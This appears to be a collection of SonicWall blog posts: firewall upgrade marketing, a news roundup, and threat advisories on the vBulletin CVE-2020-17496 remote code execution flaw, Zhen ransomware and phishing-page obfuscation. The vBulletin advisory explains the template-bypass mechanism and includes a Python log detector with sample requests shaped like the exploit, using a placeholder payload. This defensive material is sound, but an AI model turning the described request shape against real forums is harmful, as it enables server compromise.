10 Reasons to Upgrade to the Latest SonicWall TZ Firewall

Some people prefer not to upgrade their products till the bitter end. In some cases, this is fine — you may be able to live with the fact that the laptop you got for college graduation a decade ago won’t run “Hitman 2” or “Metro Exodus,” as long as it’ll connect to the internet and give you a place to store all your MP3s.

But the risks of running an aging firewall extend far beyond fear of missing out: Firewalls must be updated regularly to stop advanced cyberattacks, as well as keep up with the speed, performance and productivity needs demanded by today’s workplace. Here are the top ten reasons why you should consider updating your legacy firewall to the latest SonicWall TZ Series next-generation firewall:


Stop the Most Advanced Threats

Advanced cyber threats are on the rise and affect all businesses and organizations. The cloud-based, multi-engine SonicWall Capture Advanced Threat Protection (ATP) sandbox service provides high security effectiveness against advanced persistent threats and new attacks, including ‘never-before-seen’ ransomware, malware and side-channel attacks. Capture ATP subscribers discover and stop over 1,000 new attacks each business day.

Why upgrade: SonicWall Capture ATP is only available for SOHO 250, TZ350, TZ400 and above firewalls, as well as the NSa and NSsp line. This service is not available for legacy firewalls, including TZ105, TZ205 and TZ215 firewalls.


Inspect More Encrypted Traffic without Slowing Performance

Never be forced to choose between performance and security. With the increased network bandwidth requirements from today’s SaaS apps, video streaming and social media, firewalls with faster deep packet inspection (DPI) offer better network security without performance degradation.

During the first half of 2020, 1 in 12 SonicWall customers with DPI-SSL activated saw malware on encrypted traffic. And the numbers are on the rise: In June, SonicWall recorded 378,736 of these attacks—more than at any other point in 2020 or the last half of 2019.

Simply put, faster DPI performance provides organizations with a greater capacity to utilize higher internet speeds and support more concurrent users — all without sacrificing security.

Why upgrade: SonicWall TZ350 and TZ400 firewalls offer significantly faster DPI performance than the TZ 105 (up to 24x), TZ 205 (up to 15x) and TZ 215 (up to 10x).


Inspect Encrypted Traffic without Increasing Costs

The vast majority of web traffic is now encrypted. And without the proper security controls in place, traffic encrypted by TLS/SSL standards provides cybercriminals a backdoor to your network.

That’s why deep packet inspection of encrypted traffic (DPI for TLS/SSL) is mandatory for businesses of all sizes. Unfortunately, some firewall vendors upcharge you for proper TLS/SSL inspection capabilities (or don’t offer it at all).

Why upgrade: SonicWall TZ350 and TZ400 firewalls include the DPI-SSL license (by default) to inspect encrypted traffic at no additional cost, thereby reducing capital expense. Unfortunately, the TZ105, TZ205 and TZ215 do not support inspection of encrypted traffic.


Upgrade Your TZ Firewall

Ready to upgrade to the newest SonicWall TZ firewall? Take advantage of the SonicWall Secure Upgrade Plus program to save money when you replace your existing SonicWall firewall or other eligible security appliance.


Secure Growing Remote Workforce

With today’s remote workforce far larger than ever before, companies need the ability to provide employees with secure access to data — anytime and anywhere. A larger number of secure VPN connections is essential to support the increasing number of remote users. But based on the firewall(s) you have deployed, you may have a limit on how many remote employees you can protect at a single time.

Why upgrade: The latest SonicWall TZ400 firewall supports 10 times the number of SSL-VPN clients as the TZ 205 and TZ 215 (100 vs. 10). The TZ350 firewall enables 7.5 times as many SSL-VPN clients as the TZ 205 and TZ 215 (75 vs. 10).


Support Faster Wi-Fi Speeds

The world is wireless. Wi-Fi speeds — and users’ appetite for connectivity — are increasing exponentially. The 802.11ac wireless standard delivers the performance, range and reliability of high-speed wireless technology for an enhanced user experience. But in a properly secured environment, 802.11ac access points must be paired with a firewall that can support the 802.11ac wireless standard.

Why upgrade: The SonicWall TZ350 and TZ400 firewalls support the 802.11ac wireless standard as well as SonicWave 802.11ac Wave 2 access points for high-speed wireless networking. Unfortunately, the legacy TZ105, TZ205 and TZ215 firewalls only support the slower legacy 802.11n wireless standard, and do not work with the latest SonicWave wireless access points.


Reduce Support Costs

Single sign-on (SSO) technology helps improve employee productivity and reduce IT support costs by enabling users to safely gain access to connected systems with a single ID and password. Simply put, the more systems users can access with a single ID, the fewer support calls, IT tickets and complaints will be generated. This equals real savings to your organization.

Why upgrade: The SonicWall TZ350 and TZ400 firewalls enable twice the population of users (500 vs. 250) to benefit from the use of single sign-on.


Protect More Concurrent Users

There should rarely be a limit on how many users you are able to protect. A higher number of concurrent connections provides greater scalability by enabling more simultaneous user sessions to be active and protected by the firewall.

Why upgrade: The newest SonicWall TZ350 and TZ400 firewalls enable a much larger number of concurrent connections per second, plus deep packet inspection of TLS/SSL-encrypted connections, compared to the TZ105, TZ205 and TZ215.


Increase Speed to Keep Pace with Threat Processing

Modern cybersecurity requires firewalls that can manage network traffic more quickly to deliver the high performance needed for modern-day threat processing. Legacy firewalls can’t process as much traffic volume, sometimes hindering performance and efficiency. This can result in businesses being unable to achieve their promised internet speeds.

Why upgrade: The SonicWall TZ400 firewall, for example, has double the number of security processors as the TZ205 and TZ215 (4 vs. 2). In addition, TZ350 and TZ400 have higher speed processors (1.2 GHz and 800 MHz, respectively), compared with 400/500 MHz processors in the previous TZ205 and TZ215 firewalls. These speed boosts keep your business humming and safe from modern threats.


Boost Memory for Added Users, Logs & Policies

The number of users who require security on your network grows by the day. Unfortunately, the on-board memory of legacy firewalls can only support a finite footprint of users on the network. Advanced firewalls offer more onboard memory to allow for more rules and policies, users, and log messages to be stored on the firewall, making reporting easily accessible.

Why upgrade: The SonicWall TZ350 and TZ400 firewalls have up to four times the onboard memory of the TZ205 and TZ215 (1 GB vs. 256 MB/512 MB). This increased capacity empowers organizations to use a single TZ firewall to protect a larger userbase with deeper and more robust rules and policies.


Boost Performance, Security with Additional VLANs

Creating a greater number of virtual local area networks (VLANs) enables organizations to segment users and devices into additional groups, improving performance and security while reducing hardware costs. The ability to scale these VLANs depends on a number of factors, most notably how many a firewall can support.

Why upgrade: The SonicWall TZ400 firewall provides the ability to create up to five times the number of VLANs as the TZ 205 and TZ 215 (50 vs. 10/20). The TZ350 firewall enables the creation of 2.5 times more VLANs than the TZ 205 (25 vs. 10).


About SonicWall TZ Next-Generation Firewalls

Get high-speed threat prevention in a flexible, integrated security solution with the SonicWall TZ Series. Designed for small networks and distributed enterprises with remote and branch locations, SonicWall TZ next-generation firewalls offer five different models that can be tuned to meet your specific needs.

Feature                          TZ105/W      TZ205/W        TZ215/W        TZ300/W           TZ400/W
Memory (RAM)                     32/256 MB    32/256 MB      32/512 MB      1 GB              1 GB
DPI performance                  25 Mbps      40 Mbps        60 Mbps        100 Mbps          300 Mbps
Max. connections per second      1,000/sec    1,500/sec      1,800/sec      5,000/sec         6,000/sec
Max. connections (SPI)           8,000        12,000         48,000         50,000            100,000
Max. connections (DPI)           8,000        12,000         32,000         50,000            90,000
Max. connections (DPI SSL)       -            -              -              500               500
SSL VPN licenses (max.)          1 (10)       1 (15)         2 (10)         1 (50)            (100)
Wireless standards               802.11n      802.11a/b/g/n  802.11a/b/g/n  802.11a/b/g/n/ac  802.11a/b/g/n/ac
SSO users                        150          250            250            500               500
VLAN interfaces                  5            10             20             25                50
DPI SSL licenses included        No           No             No             Yes               Yes
Capture ATP sandbox service      No           No             No             Yes               Yes

Advanced networking and management features, such as Secure SD-WAN and Zero-Touch Deployment, make it easy to bring up new sites as you need. Adding optional capabilities, such as PoE/PoE+ support and 802.11ac Wi-Fi, helps create a unified security solution that protects your network and data from the latest threats over wired and wireless connections.


10 Reasons to Upgrade to the Latest SonicWall NSa Firewall

There are some things that are with you for life: Leather workboots on their fifth resole, your grandpa’s fishing vest, a thermos from scout camp that’s still going strong decades later. But when it comes to protection, staying current matters.

If you wouldn’t trust a 15-year-old tube of sunscreen to protect your skin, and you wouldn’t put your child in the carseat your mother saved from when you were a kid, why would you trust a legacy firewall to protect your network?

If you’re still running an older SonicWall NSA or E Series model, here are 10 reasons you should consider upgrading to the latest mid-range SonicWall NSa next-generation firewall.

Stop the Most Advanced Threats

Advanced persistent threats move with great speed and tenacity, and are designed to target and infiltrate all businesses and organizations.

However, a cloud-based, multi-engine sandbox, such as the SonicWall Capture Advanced Threat Protection (ATP) service, provides real-time security against advanced cyberattacks, including ‘never-before-seen’ ransomware, malware and side-channel attacks. Capture ATP subscribers discover and stop more than 1,000 new attacks each business day.

Why upgrade: SonicWall Capture ATP is only available for the NSA/NSa 2600 and newer next-generation firewalls, as well as the current TZ and NSsp product lines (sixth generation or newer). This service is not available for legacy SonicWall firewalls, including some NSA and E Series models (usually silver in color with the old blue SonicWall logo).


Inspect Traffic without Slowing Performance

You should never be put into a position to choose between security and performance. With bandwidth-hungry apps woven into our everyday lives — SaaS apps, video streaming and social media — firewalls with faster deep packet inspection (DPI) are better at securing networks without greatly affecting performance.

During the first half of 2020, 1 in 12 SonicWall customers with DPI-SSL turned on saw malware on encrypted traffic. And the numbers are on the rise: In June, SonicWall recorded 378,736 of these attacks—more than at any other point in 2020 or the last half of 2019.

Faster DPI performance gives businesses greater capacity to utilize higher internet speeds and support more concurrent users without ever sacrificing security.

Why upgrade: For example, the NSa 2650 delivers a 25% DPI-SSL performance improvement over the NSA 2600. SonicWall NSa 2650 and newer firewalls (e.g., 2650-9650) offer significantly faster DPI performance than their predecessors, the NSA 2600-9600 range, E Series models and other older appliances.


Inspect TLS/SSL Traffic without Increasing Costs

The majority of web traffic is encrypted today. Without proper security controls in place, TLS/SSL encryption standards provide cybercriminals easy access to your network.

That’s why deep packet inspection of encrypted traffic (DPI for TLS/SSL) is mandatory. Some firewall vendors, unfortunately, upcharge for proper TLS/SSL inspection capabilities or simply don’t offer the capability at all. Inspecting TLS/SSL traffic also takes compute power, so organizations need a firewall that can process TLS-encrypted traffic without hurting performance.

Why upgrade: The latest SonicWall NSa firewalls include the DPI-SSL license (by default) to inspect encrypted traffic at no additional cost, thereby reducing capital expense. Unfortunately, older-generation NSA firewalls (usually silver in color with our old logo) do not support inspection of encrypted traffic.

Upgrade Your NSa Firewall

Ready to upgrade to the newest SonicWall NSa firewall? Take advantage of the SonicWall Secure Upgrade Plus program to save money when you replace your existing SonicWall firewall or other eligible security appliance.


Expand Remote Branch/Site Security

For organizations with remote and branch locations, such as retail POS businesses, schools, banks and more, the ability to create a larger number of site-to-site VPN tunnels to connect distributed networks together and securely share data is essential. But not all firewalls have the capability or capacity to make this happen.

Why upgrade: By moving to the latest NSa Series firewall, your organization can secure more remote branches, services and devices. This is particularly powerful for distributed enterprises, retail organizations, etc. The NSa 2650, for example, enables the creation of 4x more site-to-site VPN tunnels than the NSA 2600 (1,000 vs. 250).


Support More High-Speed Wi-Fi Connections

Fast and secure Wi-Fi is a requirement in today’s hyper-connected world. Today’s wireless standard, 802.11ac, delivers the performance, range and reliability of high-speed wireless technology for a safe and fast user experience.

In a properly secured environment, wireless access points must be paired with a firewall that can support 802.11ac wireless standards.

Why upgrade: Newer firewalls can support more connections. The option to connect a larger number of wireless access points to a single firewall enables organizations to extend their wireless network farther without purchasing additional hardware.

Combine the latest NSa Series next-generation firewall with a SonicWall SonicWave 802.11ac Wave 2 wireless access point to create a high-speed wireless network security solution.

NSa Series firewalls and SonicWave 400 Series wireless access points both feature 2.5 gigabit Ethernet ports that can support multi-gigabit wireless throughput, which is available in the 802.11ac Wave 2 wireless standard. In addition, you can connect more wireless access points to the latest NSa firewall. The NSa 2650, for example, supports 1.5x the number of connected SonicWave wireless access points as the NSA 2600 (48 vs. 32).

Unfortunately, legacy NSA and older firewalls (as well as those on SonicOS 5.x or older firmware) do not offer multi-gigabit ports to accommodate the faster throughput supported by Wave 2 wireless standard.


Decrease Support Costs

Single sign-on (SSO) technology helps secure your environment, helps employees be more productive and helps shrink IT support costs (e.g., tickets, calls, etc.) by enabling users to safely gain access to connected systems with a single ID and password.

Simply, the more users who can access a system with a single ID, the fewer support calls, IT tickets and complaints that will be generated. This self-service approach means real savings to your business or enterprise.

Why upgrade: The NSa 2650, for example, allows a larger population of users (40,000 vs. 30,000) to benefit from the use of SSO compared to the legacy NSA 2600. This disparity widens the further you go up the product line.


Increase Network Capacity

With increased network bandwidth requirements from apps, video streaming and social media, faster DPI and DPI-SSL performance provides a secure network without performance degradation.

Faster DPI performance also provides organizations with a greater capacity to utilize higher internet speeds and support more concurrent users. A higher number of concurrent connections provides greater scalability by enabling more simultaneous user sessions to be active and protected by the firewall.

Why upgrade: The NSa 2650 enables 500,000 deep packet inspection (DPI) connections and up to 100,000 deep packet inspection of TLS/SSL-encrypted (DPI-SSL) connections compared to the 250,000 for DPI and 1,000 for DPI-SSL on the NSA 2600 and older models, such as the NSA 220 (32,000 for DPI).


Boost Memory for Added Users, Logs & Policies

The number of users who require security on your network grows by the day. Unfortunately, the on-board memory of legacy firewalls can only support a finite footprint of users on the network.

Advanced NSa firewalls offer more onboard memory to allow for more rules and policies, users, and log messages to be stored on the firewall, making reporting easily accessible.

Why upgrade: The NSa 2650 has twice the onboard memory of the NSA 2600 (4 GB vs. 2 GB) and eight times the memory of the NSA 220 (4 GB vs. 512MB). This increased capacity empowers organizations to use a single NSa firewall to protect a larger userbase with deeper and more robust rules and policies.


Many Ports in a Storm

It’s time to clean up your server room or IT area. Having a greater number of ports allows organizations to connect more SonicWall devices directly to the firewall without needing to purchase a switch. In addition, organizations that require increased throughput to support bandwidth-intensive applications and data transfer need multi-gigabit ports.

Why upgrade: Newer NSa firewalls offer many more ports than their predecessors. For example, the NSa 2650 has 2.5x the number of ports as the NSA 2600 (20 vs. 8). The NSa 2650 also features eight 2.5 GbE ports while the NSA 2600 has none.


Improve Business Continuity

Many enterprises and larger organizations build business continuity and disaster recovery plans into their processes. Part of this planning is ensuring there’s a contingency for as many scenarios as possible, not the least of which is power. Many legacy firewalls only offer a single power supply. Newer models offer a second power supply to ensure business continuity if one power supply fails.

Why upgrade: While the current NSa line and last-generation NSa Series both include a single power supply, the NSa 2650-9650 have an additional slot to add an optional second power supply for critical redundancy.


About SonicWall NSa Next-Generation Firewalls

The SonicWall Network Security appliance (NSa) Series mid-range firewalls consolidate automated advanced threat prevention technologies in a mid-range next-generation firewall platform.

Built on a multi-core hardware architecture featuring 10-GbE and 2.5-GbE interfaces, the NSa Series scales to meet the performance demands of mid-size networks, branch offices and distributed enterprises. NSa Series firewalls feature cloud-based and on-box capabilities such as TLS/SSL decryption and inspection, application intelligence and control, Secure SD-WAN, real-time visualization and WLAN management.

For a closer look at the NSa range of firewalls, explore the specifications table below or download the complete SonicWall NSa data sheet.



SonicWall’s Jason Carter Recognized as One of CRN’s ‘100 People You Don’t Know But Should’

As COVID-related issues plague 2020, some individuals rose to meet these new challenges head-on, helping channel partners eager to address customer needs in what would become the ‘new business norm.’

One of them — SonicWall Vice President, Global Inside Sales and Installed Base Programs Jason Carter — has been named one of the CRN’s 100 People You Don’t Know But Should for 2020.

“This year has certainly had its hurdles, but it’s been amazing to be part of a concerted industry effort that provides the security solutions newly distributed networks desperately need,” said Carter. “I look forward to collaborating with existing partners, new recruits and distributors to solve new challenges as organizations face unprecedented, pervasive attacks.”

Based on feedback from leading solution providers and industry executives, the CRN editorial team uses the 100 People You Don’t Know But Should list to draw attention to those outstanding channel players who may not be household names, but still work tirelessly to keep their partners thriving and the IT channel growing.

“Managing a successful channel partner program today calls for a small army of people, but only a few Channel Chiefs tend to enjoy widespread recognition,” said Blaine Raddon, CEO of The Channel Company. “With the 100 People You Don’t Know But Should, we are delighted to shine a spotlight on an exceptional group of unsung team members, giving them some of the acclaim they deserve for their indispensable contributions to channel success.”

Jason works as part of the SonicWall SecureFirst partner program, which consists of over 20,000 channel partners worldwide. The program provides real-time cyber-threat intelligence; education on current and emerging threats and the SonicWall solutions designed to address them; and an accreditation and certification capability that significantly accelerates our partners’ effectiveness and success. Since its inception, the program has administered 668,303 successful exams and more than 334,152 hours of training.

CVE-2020-17496 – vBulletin RCE vulnerability actively being exploited in the wild

The SonicWall Capture Labs Threat Research team observes attackers actively exploiting the recent remote code execution vulnerability reported in vBulletin. vBulletin is a popular forum software package used by about 20,000 websites. It is written in PHP and uses the MySQL database.

CVE-2020-17496 | Vulnerability:

A remote code execution vulnerability has been reported in vBulletin. This vulnerability is due to improper validation of subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. It is a bypass for CVE-2019-16759, a critical pre-authentication vulnerability in vBulletin that was disclosed in September 2019. In that earlier flaw, when an attacker sent a crafted ajax request containing the template name widget_php with malicious code placed in the parameter widgetConfig['code'], the render engine executed the code in the request. It was fixed by checking the template name: if the name is widget_php, the engine won’t render the requested template. That made widget_php the only template that could be utilized for PHP code execution, and the check only looked at the top-level template name. In the latest bypass, the tabbedcontainer_tab_panel template widget is found to be capable of loading “a user-controlled child template,” effectively bypassing the patch for CVE-2019-16759.

Exploit:

In the below post request, the child template name is widget_php and the malicious code can be passed through subWidget elements allowing remote code execution.


A remote, unauthenticated attacker could exploit this vulnerability by sending the above crafted request to the vulnerable server. Successful exploitation could result in remote code execution.
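A log-side check for the two request shapes described above, added here as an example (it is not SonicWall’s IPS signature and not vBulletin code). The log format, the client addresses and the parameter layout under subWidgets are constructed for the example; because the real layout may differ, the detector looks for the widget_php template name in any parameter key or value rather than in one fixed field, which is exactly the gap the original patch left open.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Endpoint family and template names are taken from the advisory text above.
RENDER_PREFIX = "/ajax/render/"
BYPASS_WIDGET = "widget_tabbedcontainer_tab_panel"   # CVE-2020-17496 entry point
DANGEROUS_TEMPLATE = "widget_php"                    # template that evaluates PHP

# Constructed log format for this example: "<client> <method> <path> <raw-body>"
# (body is "-" when the request carried none).
LOG_LINE = re.compile(r"^(?P<client>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<body>.*)$")


def parse_log_line(line: str) -> Optional[dict]:
    """Split one constructed access-log line into its fields; None if malformed."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["body"] = "" if rec["body"] == "-" else rec["body"]
    return rec


def _mentions_template(params: dict) -> List[str]:
    """Return the parameter names whose key or value names widget_php.
    Keys and values are both checked: the CVE-2019-16759 patch only inspected
    the top-level template name, and the 2020 bypass moves the name into a
    child widget parameter instead."""
    hits = []
    for key, values in params.items():
        if DANGEROUS_TEMPLATE in key.lower() or any(
            DANGEROUS_TEMPLATE in v.lower() for v in values
        ):
            hits.append(key)
    return hits


def classify_request(path: str, body: str) -> Optional[str]:
    """Classify one request against the ajax/render endpoint.
    Returns None for traffic that does not match, otherwise a tag:
      'direct-widget_php'      - the CVE-2019-16759 shape (rendering widget_php itself)
      'tabbedcontainer-bypass' - the CVE-2020-17496 shape (widget_php smuggled in as a
                                 child template of widget_tabbedcontainer_tab_panel)"""
    parts = urlsplit(path)
    route = parts.path.lower()
    if RENDER_PREFIX not in route:
        return None
    widget = route.split(RENDER_PREFIX, 1)[1].strip("/")
    # Assumption of this example: parameters may arrive in the query string or the
    # body, so both are merged before inspection. parse_qs also percent-decodes them.
    params = parse_qs(parts.query, keep_blank_values=True)
    for key, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)
    if widget == DANGEROUS_TEMPLATE:
        return "direct-widget_php"
    if widget == BYPASS_WIDGET and _mentions_template(params):
        return "tabbedcontainer-bypass"
    return None


def scan_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Run classify_request over constructed log lines; returns (client, tag) pairs."""
    findings = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        tag = classify_request(rec["path"], rec["body"])
        if tag:
            findings.append((rec["client"], tag))
    return findings


# Constructed sample lines (RFC 5737 documentation addresses). The subWidgets
# parameter layout is illustrative only; the code value is a placeholder.
SAMPLE_LOG = [
    "198.51.100.7 POST /ajax/render/widget_tabbedcontainer_tab_panel subWidgets[0]=widget_php&widgetConfig[code]=PLACEHOLDER",
    "203.0.113.9 POST /ajax/render/widget_php widgetConfig[code]=PLACEHOLDER",
    "192.0.2.44 GET /ajax/render/widget_tabbedcontainer_tab_panel?foo=bar -",
    "192.0.2.45 GET /forum/index.php -",
]

if __name__ == "__main__":
    for client, tag in scan_log(SAMPLE_LOG):
        print(f"{client}: {tag}")
```

Percent-encoded or mixed-case variants of the template name are normalised by parse_qs and the lower-casing, so a request body such as subWidgets%5B0%5D=Widget_PHP is still classified.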

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15163 vBulletin widget_tabbedContainer_tab_panel Remote Command Execution

Affected Products:

All versions of vBulletin prior to 5.6.x are affected by this vulnerability. Users should migrate to a patched version as soon as possible.

Zhen ransomware actively spreading in the wild

The SonicWall Capture Labs threat research team observed reports of a new variant family of Zhen ransomware [Zhen.RSM] actively spreading in the wild.

The Zhen ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
  • %App.path%\[Name].Zhen (encrypted file)
  • %App.path%\payment request.txt (recovery instructions)

Once the computer is compromised, the ransomware runs the following commands:  (Actual Source code)

When encrypting files it will use the AES encryption algorithm and only encrypt those files that match the following extensions:

The ransomware encrypts all the files and appends the [Zhen] extension onto each encrypted file’s filename.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signatures:

  • GAV: ZHEN.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 09-25-20

This week, foreign hackers made headlines for targeting everything from COVID-19 research, to NASA, to the U.S. presidential election.


SonicWall in the News

Top 5 CyberSecurity Innovations and Why They’re Drawing In The Money — TechGenix

  • SonicWall’s product with Perimeter 81 was included in the article as an innovation in the zero-trust sector.

ChannelPro Weekly Podcast: Episode #157 – The New M&A (Mongrels & Animals) — ChannelPro Weekly

  • In its weekly news podcast, ChannelPro Network discussed SonicWall’s 7th generation of security products.

Coronavirus Puts Security At The Heart Of The Agenda — MicroScope

  • Terry Greer-King, vice-president for EMEA at SonicWall, says the “mass shift” from working within the corporate perimeter to working from home has made everyone inherently less secure, ushering in an era of “boundless cyber security.”

Making Work-From-Home Security Work — ChannelPro Network

  • In an article about how to successfully and securely work from home, SonicWall’s data on the increase in ransomware from the midyear update to the 2020 Cyber Threat Report is included to showcase the dangers of ransomware attacks.

Industry News

U.S. warns ‘foreign actors’ aim to sow doubts over mail-in voting — Reuters

  • U.S. federal law enforcement and cybersecurity agencies on Tuesday warned that “foreign actors” will likely try to discredit the November presidential election by taking advantage of the slow counting of mail-in ballots.

UK Govt Advisor Warns: Universities the Latest Frontier for Cybercriminals — IT Supply Chain

  • Students’ return to universities has coincided with a spate of attacks against academic institutions across the North of England, prompting the National Cyber Security Centre to issue a warning: Prepare for disruption as the term starts.

FBI Opens China-Related Counterintelligence Case Every 10 Hours — SC Media

  • FBI Director Christopher Wray offered the House Homeland Security Committee some sobering news about China: the FBI opens a new China-related counterintelligence case roughly every 10 hours.

Ransomware gang targets Russian businesses in rare coordinated attacks — ZDNet

  • Group breaks an unofficial rule in the cybercrime underground not to target the former Soviet space.

Lessons from the ransomware death: Prioritize cyber emergency preparedness — SC Magazine

  • The death of a woman, at least in part due to a ransomware attack, has placed security teams on high alert.

“LokiBot,” the malware that steals your most sensitive data, is on the rise — Ars Technica

  • Officials are seeing a big uptick in infections coming from LokiBot, an open-source DIY malware package that’s openly sold or traded in underground forums. It steals passwords and cryptocurrency wallets, and can also download and install new malware.

The dark web won’t hide you anymore, police warn crooks — ZDNet

  • ‘Operation Disruptor’ involved agencies from nine countries and resulted in the seizure of over $6.5m in cash and cryptocurrencies, as criminals are warned law enforcement will track them down.

Healthcare lags behind in critical vulnerability management, banks hold their ground — ZDNet

  • New research sheds light on which industries are performing well when it comes to patching high-risk bugs.

Officials say NASA facing increased targeting by foreign and domestic hackers — The Hill

  • Top officials at NASA say the agency is facing increasing attempts by foreign hackers to target sensitive information as it works to improve its IT security during the COVID-19 pandemic.

FBI sounds alarm on rampant personal-data theft by China-backed hackers — The Washington Times

  • China is engaged in massive data mining in the U.S. and likely has stolen personal information on nearly half of the entire U.S. population, FBI Director Christopher Wray revealed.

Chinese and Russian hackers pose ‘very, very real threat’ to COVID-19 research: FBI Director Wray — The Washington Times

  • Foreign hackers searching for ways to steal coronavirus research remain a “very, very real cyber threat,” FBI Director Christopher A. Wray told the House Homeland Security Committee.

U.K. warns of surge in ransomware threats against education sector — Bleeping Computer

  • The U.K. National Cyber Security Centre has issued an alert about a surge in ransomware targeting educational institutions, urging them to follow new recommendations for mitigating attacks.

In Case You Missed It

Advanced Threats: Am I At Risk?

In “The Art of War,” Sun Tzu said, “If you know the enemy and know yourself, you need not fear the result of a hundred battles … if you know neither the enemy nor yourself, you will succumb in every battle.”

While he couldn’t have foreseen the digital salvos of two thousand years hence, his words ring as true for today’s cybersecurity arms race as they did for ancient Chinese military strategy. And now that the COVID-19 pandemic has ushered in a future where everyone is remote, everyone is mobile and everyone is less secure, cybercriminals are redoubling their efforts and specifically targeting remote workers — making it more important than ever to know what you’re up against.

Unfortunately, when it comes to cybercrime, it’s often much harder to know who your enemy is, where they’re located, or what weaponry they’re bringing to bear. Worse, in some cases you may not know until much later that you’ve even been attacked at all. We’ve seen cyberthreats evolve from basic computer viruses to widespread and devastating attacks such as Stuxnet, WannaCry, NotPetya, Spectre and more. But exactly how advanced and prevalent are today’s attacks?

According to the midyear update to the 2020 SonicWall Cyber Threat Report, while the quantity of malware deployed overall is dropping, the malware that is going out is both more advanced and more targeted than ever before. The degree of sophistication displayed in some phishing and social engineering strategies proves that even if you don’t know your adversary, they certainly know you — and if they’re successful in fooling you, their weapons of choice are often capable of completely circumventing legacy cybersecurity solutions.

Threats of this kind often stay obfuscated while security solutions inspect them and only unpack and execute once they are in memory, or, worse, at the CPU and hardware level of a system you share with other tenants, for example a cloud service where a side-channel attack on the hardware itself can leak your information.

And if you’re thinking only a handful of cybercriminals have access to this level of sophistication, think again.

So far in 2020, every month has seen a significant year-over-year increase in the number of malware variants found by SonicWall Capture ATP (Advanced Threat Protection) and RTDMI (Real-time Deep Memory Inspection); combined, they represent a full 62 percent increase over 2019’s first-half totals. In the first six months of 2020, Capture ATP and RTDMI found 315,395 new malware variants, including threats that show no malicious behavior while under analysis and hide their payloads behind encryption.

During this time, there has also been a whopping 176 percent increase in the number of malicious Office files, including some that can evade signature-based anti-malware engines and hinder sandbox debugging and analysis. These files look just like any other file you may receive in the course of your workday, but can lead to data exfiltration, ransomware infections and more.

With the time between an attack’s proof of concept and threat researchers spotting the attack in the wild narrowing to just hours — and with attackers developing ways to create hundreds of variations on an attack faster than they can be identified and patched — it’s tempting to concede defeat.

Fortunately, however, it’s still possible to thwart the majority of cyberthreats if you deploy the correct countermeasures. Join SonicWall cybersecurity expert Simon Wikberg as he explores today’s biggest threats and why they succeed in our upcoming webinar, “A Step Ahead: Future-proofing Against Tomorrow’s Attacks.”

He’ll tackle the “know yourself” side of the equation by offering ways to determine your risk and profile your existing cybersecurity strategy.

And by sharing data from the SonicWall 2020 Mid-Year Cyber Threat Report, he’ll also help you become better acquainted with your adversaries, by revealing the places cybercriminals are targeting, spotlighting the techniques they’re using, and offering clues as to what they may be doing next.

By learning their tactics, you’ll be better able to create a plan, deploy proper countermeasures, and significantly decrease your risk of compromise in the next hundred battles — and beyond.

Click here to register for the webinar.

SiteCloak Page Obfuscation Techniques Leading to Greater Number of Missed Phishing Attacks

Ever since COVID-19 began closing offices and largely restricting people to their homes, cyber adversaries have been having a field day using the pandemic as a launchpad for phishing attacks. Organizations and individuals must be aware of the detective, preventive and protective measures required to safeguard their information assets against these attacks. We have seen a rise in the number of phishing attacks that bypass Office 365 due to the attackers’ use of obfuscation techniques on the credential harvesting website.

These SiteCloak methods bypass Microsoft’s real-time URL-filtering scanners by obfuscating the credential-harvesting page. This behavior is widespread, using a variety of techniques from multiple threat actors.

Attack Summary Overview:

Platform: Microsoft 365 Email

Email Security: Exchange Online Protection and Microsoft Advanced Threat Protection

Targets: All organizations, all sizes

Payload: Malicious Link

Technique: Obfuscation of Credential Harvesting Page

What is a SiteCloak attack?

To identify a malicious URL within an email, Microsoft will follow a link to scan the target page for potential malware or phishing behavior. To combat this, attackers are hiding the intent of the target page by using a variety of obfuscation techniques. This behavior is widespread and utilizes a variety of methods, some more sophisticated than others, borrowed from multiple threat actors. Most of these methods are capable of fooling Microsoft’s scanners.

In most cases, the target page turns out to be a credential harvesting site, but because these techniques are now in widespread use by several criminal groups, they are independent of the purpose of the page. If the user is not vigilant and provides their credentials, the user account is compromised.

Why are SiteCloak methods effective?

  • Concealed Page Intent: Microsoft URL filters are unable to determine the intent of an obfuscated page, so a malicious email is allowed to reach the user inbox.
  • Multiple Vulnerabilities: While categorized as a single method, attackers are using a variety of obfuscation techniques, meaning there is no single vulnerability to close. Even simple techniques are successful today, but while these are eventually caught, more advanced methods continue to remain effective.
  • Multiple Actors: Page obfuscation is now in use by multiple actors. The techniques are typical of email obfuscation, and many of them are old, so there is no direct link between a threat actor and their methodology.

What can you do?

  • Use a Password Manager: The best defense against most credential harvesting attacks is the use of a password manager. Many are free, and a password manager only fills credentials on the domain they were saved for, so it will not offer them to a lookalike site, however authentic the page looks. Ideally you never know your password yourself.
  • Enable Multi-factor Authentication: MFA renders a stolen username/password pair useless on its own to an attacker. Phishing-resistant methods such as FIDO2 security keys go further and also defeat real-time relay attacks that forward one-time codes.

Attack examples

These techniques are in use by a large number of threat organizations, so their methods vary widely.

  • Basic SiteCloak Obfuscation: ZeroFont
    In the simplest version of the attack, the credential harvesting page uses the same ZeroFont technique that was once a popular method to bypass Microsoft’s email scanners. Even old techniques can successfully fool the website scanner.
  • Advanced SiteCloak Obfuscation: JavaScript Encoding
    In more advanced methods, the webpage is encoded using multiple layers of JavaScript obfuscation.
    The JavaScript unescape() function then reads the ‘html_encoder_data’ string and decodes it to render the malicious web page.

